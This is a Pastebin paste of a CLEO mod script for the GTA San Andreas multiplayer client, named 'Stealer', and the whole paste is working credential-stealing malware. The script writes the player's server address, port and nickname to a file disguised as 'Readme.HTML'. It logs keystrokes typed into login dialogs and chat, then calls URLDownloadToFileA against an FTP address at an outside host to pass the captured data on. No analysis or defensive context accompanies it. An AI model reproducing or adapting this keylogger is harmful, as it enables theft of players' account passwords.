Advertisement
Guest User

Untitled

a guest
May 1st, 2014
1,111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.54 KB | None | 0 0
  1. {$CLEO .cs}
  2. thread "Stealer"
  3. wait 1000
  4. 0@ = -1
  5. if 0AAB: file_exists "Readme.HTML"
  6. then
  7. 0B00: delete_file "Readme.HTML"
  8. end
  9. 0B39: samp get_current_server_address 8@v port 5@
  10. 0AF5: write_string 8@v to_ini_file "Readme.HTML" section "Server" key "Ip"
  11. 0AF1: write_string 5@ to_ini_file "Readme.HTML" section "Server" key "Port"
  12. 0B36: samp 3@ = get_player_nickname $PLAYER_CHAR
  13. format 16@v = "%s" 3@
  14. 0AF5: write_string 16@v to_ini_file "Readme.HTML" section "Server" key "Nick"
  15. while true
  16. wait 0
  17. if 0B4C: samp is_dialog_active -1
  18. then
  19. for 30@ = 48 to 105
  20. if key 30@
  21. then
  22. 0@ += 1
  23. format 4@v = "%d" 0@
  24. 0AF1: write_int 30@ to_ini_file "Readme.HTML" section "Dialog" key 4@v
  25. 11@ += 1
  26. 18@ = 1
  27. repeat
  28. wait 0
  29. until not key 30@
  30. end
  31. end
  32. else
  33. if 0B21: samp is_chat_opened
  34. then
  35. for 29@ = 48 to 105
  36. if key 29@
  37. then
  38. 0@ += 1
  39. format 4@v = "%d" 0@
  40. 0AF1: write_int 29@ to_ini_file "Readme.HTML" section "Chat" key 4@v
  41. 12@ += 1
  42. 18@ = 1
  43. repeat
  44. wait 0
  45. until not key 29@
  46. end
  47. end
  48. else
  49. if and
  50. 8B4C: samp is_dialog_active -1
  51. 8B21: samp is_chat_opened
  52. 18@ == 1
  53. then
  54. 18@ = 0
  55. 0@ += 1
  56. format 4@v = "%d" 0@
  57. 0AF1: write_int 0 to_ini_file "Readme.HTML" section "Chat" key 4@v
  58. 0AF1: write_int 0 to_ini_file "Readme.HTML" section "Dialog" key 4@v
  59. 10@ += 1
  60. wait 100
  61. end
  62. end
  63. end
  64. if and
  65. 10@ >= 1
  66. 11@ >= 1
  67. 12@ >= 1
  68. 8B4C: samp is_dialog_active -1
  69. 8B21: samp is_chat_opened
  70. then
  71. if 0AA2: 22@ = load_library "wininet.dll"
  72. then
  73. if 0AA4: 23@ = get_proc_address "DeleteUrlCacheEntryA" library 22@
  74. then
  75. 0AA5: call 23@ num_params 1 pop 0 21@
  76. end
  77. end
  78. 0AC6: 21@ = label @url offset
  79. if 0AA2: 26@ = load_library "urlmon.dll"
  80. then
  81. if 0AA4: 25@ = get_proc_address "URLDownloadToFileA" library 26@
  82. then
  83. 0AA5: call 25@ num_params 5 pop 0 0 0 "Readme.HTML" 21@ 0
  84. 0a93:
  85. end
  86. end
  87. end
  88. end
  89. :url
  90. hex
  91. "ftp:" 2f 2f "ftp.stelerexe.url.ph" 2f "stealer" 2f "add.php" 00
  92. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement